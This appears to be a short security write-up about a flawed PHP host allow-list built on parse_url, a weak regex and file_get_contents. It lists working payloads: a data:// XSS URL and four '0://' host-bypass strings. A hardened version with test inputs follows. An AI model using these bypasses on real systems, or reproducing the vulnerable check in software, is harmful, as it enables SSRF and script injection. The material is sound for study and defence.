When the PHP is written like this:
<?php
echo "Argument: ".$argv[1]."\n";
// check if argument is a valid URL
if(filter_var($argv[1], FILTER_VALIDATE_URL)) {
    // parse URL
    $r = parse_url($argv[1]);
    print_r($r);
    // check if host ends with google.com (weak check: unescaped dot, no leading anchor)
    if(preg_match('/google.com$/', $r['host'])) {
        // get page from URL and echo it back unfiltered
        $a = file_get_contents($argv[1]);
        echo($a);
    } else {
        echo "Error: Host not allowed";
    }
} else {
    echo "Error: Invalid URL";
}
?>
This yields an XSS payload (the data:// wrapper is accepted by file_get_contents and its decoded content is echoed straight back to the client):
http://xxx.com/123asd.php?1=data://text/plain;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==
Bypassing the host match (parse_url and the regex disagree about what the host is):
0://evil$google.com
0://evil.com:80,google.com:80/
0://evil.com:80;google.com:80/
0://evil.com:80://google.com
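For comparison, here is a stricter version of the same check, written as an added example for this note rather than taken from it. It assumes the intended target is google.com and its subdomains and that only http/https fetches are wanted; it allow-lists the scheme (which rejects data://, php://, file:// and the "0://" forms above), refuses userinfo and ports, validates the host characters, compares the suffix including the dot, and rebuilds the URL from the validated components instead of passing the raw input to file_get_contents.

```php
<?php
// Added example, not part of the original note. Assumptions: allowed target is
// google.com and its subdomains; only http/https are intended.

function allowed_url(string $url): ?string {
    // Reject anything filter_var does not consider a URL at all.
    if (filter_var($url, FILTER_VALIDATE_URL) === false) {
        return null;
    }
    $p = parse_url($url);
    if ($p === false) {
        return null;
    }
    // Scheme allow-list: blocks stream wrappers (data://, php://, file://)
    // and the "0://" prefix used in the bypass payloads.
    $scheme = strtolower($p['scheme'] ?? '');
    if (!in_array($scheme, ['http', 'https'], true)) {
        return null;
    }
    // Components the original check never looked at.
    if (isset($p['user']) || isset($p['pass']) || isset($p['port'])) {
        return null;
    }
    $host = strtolower($p['host'] ?? '');
    // Only letters, digits, dots and hyphens: '$', ',', ';' or ':' in the host fails.
    if ($host === '' || !preg_match('/^[a-z0-9.-]+$/', $host)) {
        return null;
    }
    // Exact match or a real subdomain. The suffix comparison includes the dot,
    // so "evilgoogle.com" and "google.com.evil.example" are both rejected.
    $suffix = '.google.com';
    if ($host !== 'google.com' && substr($host, -strlen($suffix)) !== $suffix) {
        return null;
    }
    // Rebuild the URL so the fetch uses only the components we validated.
    return $scheme . '://' . $host . ($p['path'] ?? '/')
         . (isset($p['query']) ? '?' . $p['query'] : '');
}

// Constructed inputs: the note's payloads plus a few legitimate and look-alike URLs.
$inputs = [
    'http://www.google.com/search?q=x',
    'https://google.com/',
    'http://evilgoogle.com/',
    'http://google.com.evil.example/',
    'data://text/plain;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==',
    '0://evil$google.com',
    '0://evil.com:80,google.com:80/',
    '0://evil.com:80;google.com:80/',
    '0://evil.com:80://google.com',
];
foreach ($inputs as $in) {
    $out = allowed_url($in);
    printf("%-70s => %s\n", $in, $out === null ? 'REJECTED' : $out);
}
```

Only the first two inputs produce a rebuilt URL; the rest are rejected before any fetch happens. Note that a host allow-list only constrains the name, not where it resolves: if the fetching process sits in a sensitive network, pair a check like this with egress restrictions rather than relying on string validation alone.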